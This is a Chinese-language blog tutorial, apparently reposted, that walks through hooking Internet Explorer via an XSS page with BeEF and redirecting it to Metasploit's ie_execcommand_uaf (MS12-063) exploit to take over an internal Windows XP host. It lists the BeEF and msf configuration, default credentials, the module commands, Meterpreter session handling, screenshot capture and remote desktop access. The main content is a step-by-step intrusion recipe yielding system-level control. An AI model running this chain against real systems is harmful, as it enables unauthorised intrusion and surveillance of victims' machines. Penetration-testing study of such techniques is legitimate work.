欢迎您访问程序员文章站本站旨在为大家提供分享程序员计算机编程知识!
您现在的位置是: 首页  >  网络运营

metasploit利用IE漏洞XSS挂马拿内网主机

程序员文章站 2022-05-13 09:29:03
metasploit内网渗透方面好多方式,这只是科普下xss在内网中的利用。... 14-07-17...

系统:kali

用到的工具:beef+msf

利用的ie漏洞是:http://www.rapid7.com/db/modules/exploit/windows/browser/ie_execcommand_uaf

ms12-063
automaticie 7 on windows xp sp3ie 8 on windows xp sp3ie 7 on windows vistaie 8 on windows vistaie 8 on windows 7ie 9 on windows 7
用到的beef+msf

先配置下:

root@kali:~# cd /usr/share/beef-xss/root@kali:/usr/share/beef-xss# lsbeef beef_key.pem config.yaml db gemfile modulesbeef_cert.pem bundle core extensions gemfile.lock
编辑下config.yaml
把metasploit :false改成true

metasploit利用IE漏洞XSS挂马拿内网主机

再进入extensions/metasploit/
同样修改下config.yaml
把host跟callback_host 改成自己的ip 这里是220.128

metasploit利用IE漏洞XSS挂马拿内网主机

再改动下custom path:

metasploit利用IE漏洞XSS挂马拿内网主机

这样beef已经配置好了。那就运行下metasploit

metasploit利用IE漏洞XSS挂马拿内网主机

运行msf后 数据库连接下,不然上线也会没有提示的。这里的pass 就是extensions/metasploit/config.yaml里面的pass

metasploit利用IE漏洞XSS挂马拿内网主机

这样就没有什么问题。我们可以先看一下beef.数据库只要连上了就不会出现msf的api错误的。

metasploit利用IE漏洞XSS挂马拿内网主机

进入beef

metasploit利用IE漏洞XSS挂马拿内网主机

账号密码beef 配置文件里面有。beef:beef

metasploit利用IE漏洞XSS挂马拿内网主机

那beef已经都ok了。
现在来搞下选择下要显示的页面:

metasploit利用IE漏洞XSS挂马拿内网主机

hook.js 运行beef 显示出来的。
别忘记运行下apache。

metasploit利用IE漏洞XSS挂马拿内网主机

我们再进入msf

use exploit/windows/browser/ie_execcommand_uaf
可以自己根据自己的要求来选择。

show options
port可以自已改。

metasploit利用IE漏洞XSS挂马拿内网主机

我用xp+ie7

metasploit利用IE漏洞XSS挂马拿内网主机

直接访问下我们的页面192.168.220.128/xss/
beef就会显示出来了。

metasploit利用IE漏洞XSS挂马拿内网主机

点击 commands-hookeddomain-redirect browser 让他重新跳转到我们msf生成的地址上。beef很多功能。
把地址改成192.168.220.128:8080(msf生成的地址)

metasploit利用IE漏洞XSS挂马拿内网主机

我们就会看到msf上面已经显示出来了。 回显了sessions
payload可以自己去改。我使用的meterpreter载荷

metasploit利用IE漏洞XSS挂马拿内网主机

执行sessions -i

metasploit利用IE漏洞XSS挂马拿内网主机

执行sessions -i id号
可以执行任意命令已经是系统权限

metasploit利用IE漏洞XSS挂马拿内网主机

执行下screenshost

meterpreter > screenshot screenshot saved to: /root/dlssqbkf.jpeg
就可以看到当前主机的屏幕内容。

metasploit利用IE漏洞XSS挂马拿内网主机

也可以rdesktop 远程连接上去。
参数rdesktop -f ip -u username -p password
这也是一种xss挂马拿内网主机。

注:鄙人每天都在写一些metasploit的玩法,如果有大神有什么好的方法希望告诉我,我更新在空间,分享给大家。